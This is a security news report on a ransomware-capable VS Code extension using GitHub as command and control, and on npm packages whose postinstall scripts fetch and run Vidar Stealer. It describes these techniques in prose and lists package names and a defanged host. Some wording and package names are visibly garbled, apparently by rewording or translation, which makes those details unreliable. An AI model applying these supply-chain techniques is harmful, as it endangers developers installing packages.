Vibe-encoded malicious VS code extension detected with embedded ransomware capabilities

Cybersecurity researchers have reported a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to have been created using artificial intelligence – in other words, ambiance-coded.

Secure Annex researcher John Tuckner, who reported the “susvsex” extension, said it was not trying to hide its malicious functionality. The extension was uploaded on November 5, 2025 by a user named “suspublisher18” with the description “Just testing” and the email address “donotsupport@example”.[.]com.”

“Automatically compresses, downloads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the extension’s description. Since November 6, Microsoft has intervened to remove it from the official VS Code extensions market.

According to details shared by ‘suspublisher18’, the extension is designed to automatically activate on any event, including the installation or launch of VS Code, and invoke a function named ‘zipUploadAndEncrypt’, which creates a ZIP archive of a target directory, exfiltrates it to a remote server and replaces the files with their encrypted versions.

“Fortunately, TARGET_DIRECTORY is configured to be a test directory, so it would have little impact at the moment, but it is easily updated with an extension version or as a command sent through the C2 channel discussed next,” Tuckner said.

Besides encryption, the malicious extension also uses GitHub as command and control (C2) by querying a private GitHub repository for any new commands to execute by parsing the “index.html” file. The results of running the command are written back to the same repository in the “requirements.txt” file using a GitHub access token embedded in the code.

The GitHub account associated with the repository – aykhanmv – continues to be active, with the developer claiming to be from the city of Baku, Azerbaijan.

“Superfluous comments that detail features, README files with execution instructions, and placeholder variables are clear signs of ‘vibration coded’ malware,” Tuckner said. “The expansion package accidentally included decryption tools, command and control server code, GitHub access keys to the C2 server, which others could use to take over the C2.”

Trojanized npm packages drop Vidar Infostealer

This disclosure comes as Datadog Security Labs discovered 17 npm packages that masquerade as innocuous software development kits (SDKs) and provide the advertised features, but are designed to stealthily run Vidar Stealer on infected systems. This development marks the first time that the information stealer has been distributed through the npm registry.

The cybersecurity company, which tracks the cluster under the name MUT-4831, said some of the packages were first reported on October 21, 2025, with subsequent downloads recorded the next day and on October 26. The names of the packages, posted by accounts called “aartje” and “saliii229911”, are below:

• ap-api
• bael-good-admin
• bael-god-api
• Bael-god-thank you
• botty-fork-baby
• cursor-ai-fork
• cursor-application-fork
• custom telegram-bot-api
• personalized-tg-bot-plan
• icon-react-fork
• react-icon-pkg
• sabaoa-tg-api
• oppressed at the same time
• sai-tg-api
• authorize-tg-api
• telegram-bot-start
• telegram-bot-starter

Although both accounts have since been banned, the libraries were downloaded at least 2,240 times before being removed. That said, Datadog noted that many of these downloads could likely be the result of automated scrapers.

The attack chain itself is quite simple, running as part of a post-installation script specified in the “package.json” file that downloads a ZIP archive from an external server (“bullethost[.]cloud”) and run the Vidar executable contained in the ZIP file. The Vidar 2.0 examples were found to use hardcoded Telegram and Steam accounts as dead resolvers to recover the actual C2 server.

In some variations, a post-installation PowerShell script, embedded directly in the package.json file, is used to download the ZIP archive, after which execution control is passed to a JavaScript file to complete the rest of the attack steps.

‘

“It is unclear why MUT-4831 chose to modify the post-installation script in this manner,” said security researchers Tesnim Hamdouni, Ian Kretz and Sebastian Obregoso. “One possible explanation is that diversification of implementations may be advantageous to the malicious actor in terms of surviving detection.”

This discovery is just another in a long list of supply chain attacks targeting the open source ecosystem spanning npm, PyPI, RubyGems, and Open VSX, making it crucial that developers do their due diligence, review changelogs, and watch out for techniques like typosquatting and dependency confusion before installing packages.